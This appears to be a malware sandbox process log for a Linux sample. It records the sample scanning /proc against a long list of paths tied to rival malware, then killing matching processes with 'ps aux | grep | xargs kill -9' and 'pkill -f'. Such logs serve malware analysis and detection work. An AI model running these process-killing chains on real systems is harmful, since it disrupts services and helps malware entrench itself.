/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1284
-
-
/bin/grepgrep exe2⤵PID:1287
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1286
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1291
-
-
/bin/grepgrep exe2⤵PID:1294
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1293
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1296
-
-
/bin/grepgrep exe2⤵PID:1300
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1299
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1303
-
-
/bin/grepgrep exe2⤵PID:1306
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1305
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1310
-
-
/bin/grepgrep exe2⤵PID:1313
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1312
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1316
-
-
/bin/grepgrep exe2⤵PID:1320
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1319
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1322
-
-
/bin/grepgrep exe2⤵PID:1326
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1325
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1329
-
-
/bin/grepgrep exe2⤵PID:1332
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1331
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1335
-
-
/bin/grepgrep exe2⤵PID:1339
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1338
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1341
-
-
/bin/grepgrep exe2⤵PID:1345
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1344
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1348
-
-
/bin/grepgrep exe2⤵PID:1351
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1350
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1353
-
-
/bin/grepgrep exe2⤵PID:1356
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1355
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1358
-
-
/bin/grepgrep exe2⤵PID:1361
-
-
/bin/lsls -latrh /proc/net2⤵PID:1360
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1363
-
-
/bin/grepgrep exe2⤵PID:1366
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1365
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1368
-
-
/bin/grepgrep exe2⤵PID:1371
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1370
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1373
-
-
/bin/grepgrep exe2⤵PID:1376
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1375
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1378
-
-
/bin/grepgrep exe2⤵PID:1381
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1380
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1383
-
-
/bin/grepgrep exe2⤵PID:1386
-
-
/bin/lsls -latrh /proc/self2⤵PID:1385
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1388
-
-
/bin/grepgrep exe2⤵PID:1391
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1390
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1393
-
-
/bin/grepgrep exe2⤵PID:1396
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1395
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1398
-
-
/bin/grepgrep exe2⤵PID:1401
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1400
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1403
-
-
/bin/grepgrep exe2⤵PID:1406
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1405
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1408
-
-
/bin/grepgrep exe2⤵PID:1411
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1410
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1413
-
-
/bin/grepgrep exe2⤵PID:1416
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1415
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1418
-
-
/bin/grepgrep exe2⤵PID:1421
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1420
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1423
-
-
/bin/grepgrep exe2⤵PID:1426
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1425
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1428
-
-
/bin/grepgrep exe2⤵PID:1431
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1430
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1433
-
-
/bin/grepgrep exe2⤵PID:1436
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1435
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1438
-
-
/bin/grepgrep exe2⤵PID:1441
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1440
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1443
-
-
/bin/grepgrep exe2⤵PID:1446
-
-
/bin/lsls -latrh /proc/version2⤵PID:1445
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1448
-
-
/bin/grepgrep exe2⤵PID:1451
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1450
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1453
-
-
/bin/grepgrep exe2⤵PID:1456
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1455
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1458
-
-
/bin/grepgrep exe2⤵PID:1461
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1460
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1463
-
-
/bin/grepgrep /dot2⤵PID:1465
-
-
/bin/grepgrep -v grep2⤵PID:1466
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1464
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1468
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1467
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
PID:1469
-
-
/bin/grepgrep -v grep2⤵PID:1472
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1474
-
-
/bin/grepgrep tracepath2⤵PID:1471
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1473
-
-
/bin/psps aux2⤵PID:1470
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads runtime system information
PID:1475
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1480
-
-
/bin/grepgrep -v grep2⤵PID:1478
-
-
/bin/grepgrep ./ll12⤵PID:1477
-
-
